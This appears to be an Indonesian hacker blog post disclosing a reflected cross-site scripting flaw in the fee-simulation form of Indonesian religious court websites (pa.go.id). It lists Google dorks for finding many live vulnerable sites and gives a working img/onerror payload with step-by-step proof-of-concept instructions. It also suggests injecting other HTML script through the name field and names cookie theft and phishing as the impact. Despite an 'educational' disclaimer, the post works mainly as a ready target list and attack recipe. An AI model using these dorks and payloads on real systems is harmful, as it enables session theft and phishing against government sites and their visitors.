XSS Discovered on Panjar.pa By 0x6ick
[!]Dork:
inurl:pa.go.id inurl:panjar
inurl:pa- intitle:"Pengadilan Agama" inurl:panjar
site:pa.go.id inurl:panjar
inurl:"/ar/" inurl:"panjar" site:pa.go.id
"Cetak SKUM" inurl:pa.go.id
inurl:pa.go.id intitle:"Cerai Gugatan"
site:go.id inurl:pa inurl:panjar
Hasil
[!] Target:
[+] Bug Detail:
Found bug Reflected Cross-Site Scripting (XSS) pada form input Nama di halaman simulasi biaya cerai.
Payload yang berhasil men-trigger XSS:<img src=x onerror=prompt("XSSby0x6ick")>Parameter vulnerable:
- Input field: Nama Lengkap Anda
[+] Proof of Concept (PoC):
- Step 1: Masukkan payload berikut pada field Nama Lengkap Anda:
<img src=x onerror=prompt("XSSby0x6ick")>
- Step 2: Submit form sampai muncul pop-up dari browser.
[+] pict
- Input Payload di Form
- Pop-up XSS Berhasil Muncul
Di web ini Script jso tidak bisa
Dengan script html? Bisalah
terus copas semua scriptnya di bagian nama yang lain isi ngasal
[+] Dampak:
- Potensi pencurian session cookies, phishing, dan eskalasi serangan.
- Risiko bagi user .go.id yang mengakses halaman ini.
[+] Discovered By:
0x6ick | 0x6sec: Hack, Patch, and Protect
[!] Catatan Etis:
Artikel ini hanya untuk tujuan edukasi dan meningkatkan keamanan siber di Indonesia.
Untuk artikel xss selanjutnya di sini
Posting Komentar